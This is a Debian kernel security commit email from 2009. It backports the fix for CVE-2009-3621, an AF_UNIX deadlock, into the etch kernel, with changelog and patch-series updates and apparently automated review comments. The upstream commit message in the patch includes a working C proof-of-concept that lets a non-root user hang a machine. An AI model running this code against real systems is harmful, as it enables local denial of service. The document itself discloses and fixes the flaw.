[kernel] r14577 - in dists/etch-security/linux-2.6/debian: . patches/bugfix/all patches/series

Dann Frazier dannf at alioth.debian.org
Thu Nov 5 03:29:01 UTC 2009


Author: dannf
Date: Thu Nov  5 03:28:58 2009
New Revision: 14577

Log:
AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)

Added:
   dists/etch-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
      - copied unchanged from r14564, dists/etch-security/linux-2.6.24/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
Modified:
   dists/etch-security/linux-2.6/debian/changelog
   dists/etch-security/linux-2.6/debian/patches/series/26etch1

Modified: dists/etch-security/linux-2.6/debian/changelog
==============================================================================
--- dists/etch-security/linux-2.6/debian/changelog	Thu Nov  5 03:21:09 2009	(r14576)
+++ dists/etch-security/linux-2.6/debian/changelog	Thu Nov  5 03:28:58 2009	(r14577)
@@ -11,6 +11,7 @@
     struct nfsd4_open out of the union (CVE-2009-3286)
   * fs: pipe.c null pointer dereference (CVE-2009-3547)
   * netlink: fix typo in initialization (CVE-2009-3612)
+  * AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
 
  -- dann frazier <dannf at debian.org>  Tue, 15 Sep 2009 22:19:58 -0600
 
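Review bot: the new changelog line names the CVE but not the impact, whereas a security upload benefits from a one-phrase severity hint; the commit message carried in the added patch states it plainly ("DoS attack against the local machine by non-root users"), so consider "AF_UNIX: Fix deadlock on connecting to shutdown socket, local DoS by unprivileged users (CVE-2009-3621)". Also note the stanza's trailer still reads "Tue, 15 Sep 2009", which is fine while the stanza is pending but must be refreshed before the upload is tagged.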

Copied: dists/etch-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch (from r14564, dists/etch-security/linux-2.6.24/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch)
==============================================================================
--- /dev/null	00:00:00 1970	(empty, because file is newly added)
+++ dists/etch-security/linux-2.6/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch	Thu Nov  5 03:28:58 2009	(r14577, copy of r14564, dists/etch-security/linux-2.6.24/debian/patches/bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch)
@@ -0,0 +1,84 @@
+commit 77238f2b942b38ab4e7f3aced44084493e4a8675
+Author: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+Date:   Sun Oct 18 23:17:37 2009 -0700
+
+    AF_UNIX: Fix deadlock on connecting to shutdown socket
+    
+    I found a deadlock bug in UNIX domain socket, which makes able to DoS
+    attack against the local machine by non-root users.
+    
+    How to reproduce:
+    1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
+        namespace(*), and shutdown(2) it.
+     2. Repeat connect(2)ing to the listening socket from the other sockets
+        until the connection backlog is full-filled.
+     3. connect(2) takes the CPU forever. If every core is taken, the
+        system hangs.
+    
+    PoC code: (Run as many times as cores on SMP machines.)
+    
+    int main(void)
+    {
+    	int ret;
+    	int csd;
+    	int lsd;
+    	struct sockaddr_un sun;
+    
+    	/* make an abstruct name address (*) */
+    	memset(&sun, 0, sizeof(sun));
+    	sun.sun_family = PF_UNIX;
+    	sprintf(&sun.sun_path[1], "%d", getpid());
+    
+    	/* create the listening socket and shutdown */
+    	lsd = socket(AF_UNIX, SOCK_STREAM, 0);
+    	bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
+    	listen(lsd, 1);
+    	shutdown(lsd, SHUT_RDWR);
+    
+    	/* connect loop */
+    	alarm(15); /* forcely exit the loop after 15 sec */
+    	for (;;) {
+    		csd = socket(AF_UNIX, SOCK_STREAM, 0);
+    		ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
+    		if (-1 == ret) {
+    			perror("connect()");
+    			break;
+    		}
+    		puts("Connection OK");
+    	}
+    	return 0;
+    }
+    
+    (*) Make sun_path[0] = 0 to use the abstruct namespace.
+        If a file-based socket is used, the system doesn't deadlock because
+        of context switches in the file system layer.
+    
+    Why this happens:
+     Error checks between unix_socket_connect() and unix_wait_for_peer() are
+     inconsistent. The former calls the latter to wait until the backlog is
+     processed. Despite the latter returns without doing anything when the
+     socket is shutdown, the former doesn't check the shutdown state and
+     just retries calling the latter forever.
+    
+    Patch:
+     The patch below adds shutdown check into unix_socket_connect(), so
+     connect(2) to the shutdown socket will return -ECONREFUSED.
+    
+    Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu at hitachi.com>
+    Signed-off-by: Masanori Yoshida <masanori.yoshida.tv at hitachi.com>
+    Signed-off-by: David S. Miller <davem at davemloft.net>
+
+Adjusted to apply to Debian's 2.6.24 by dann frazier <dannf at debian.org>
+
+diff -urpN linux-source-2.6.24.orig/net/unix/af_unix.c linux-source-2.6.24/net/unix/af_unix.c
+--- linux-source-2.6.24.orig/net/unix/af_unix.c	2008-01-24 15:58:37.000000000 -0700
++++ linux-source-2.6.24/net/unix/af_unix.c	2009-11-04 13:05:18.000000000 -0700
+@@ -1071,6 +1071,8 @@ restart:
+ 	err = -ECONNREFUSED;
+ 	if (other->sk_state != TCP_LISTEN)
+ 		goto out_unlock;
++	if (other->sk_shutdown & RCV_SHUTDOWN)
++		goto out_unlock;
+ 
+ 	if (skb_queue_len(&other->sk_receive_queue) >
+ 	    other->sk_max_ack_backlog) {
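Review bot: the patch header and the trailer line "Adjusted to apply to Debian's 2.6.24" both refer to the linux-2.6.24 tree, but this commit copies the file unchanged into the linux-2.6 (etch) tree, so the `@@ -1071,6 +1071,8 @@ restart:` hunk will only land with offset or fuzz against that older source; please confirm it applies cleanly there and, if so, reword the trailer so it does not misdescribe the target. On the fix itself, the placement is right: the `sk_shutdown & RCV_SHUTDOWN` test sits after the `restart:` label and after `err = -ECONNREFUSED;` inside the region that ends at `out_unlock`, so it is re-evaluated on every retry after unix_wait_for_peer() under the peer's lock, which is exactly what breaks the spin the commit message describes, and connect(2) now fails with `ECONNREFUSED` (the message's "-ECONREFUSED" is a typo for that errno). Checking only `RCV_SHUTDOWN` is sufficient for a listening socket, since the backlog lives in `sk_receive_queue`; a SHUT_RDWR as in the PoC sets that bit as well.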

Modified: dists/etch-security/linux-2.6/debian/patches/series/26etch1
==============================================================================
--- dists/etch-security/linux-2.6/debian/patches/series/26etch1	Thu Nov  5 03:21:09 2009	(r14576)
+++ dists/etch-security/linux-2.6/debian/patches/series/26etch1	Thu Nov  5 03:28:58 2009	(r14577)
@@ -12,3 +12,4 @@
 + bugfix/all/nfsd4-de-union-iattr-and-verf.patch
 + bugfix/all/fs-pipe-null-pointer-dereference.patch
 + bugfix/all/netlink-fix-typo-in-initialization.patch
++ bugfix/all/af_unix-fix-deadlock-on-connecting-to-shutdown-socket.patch
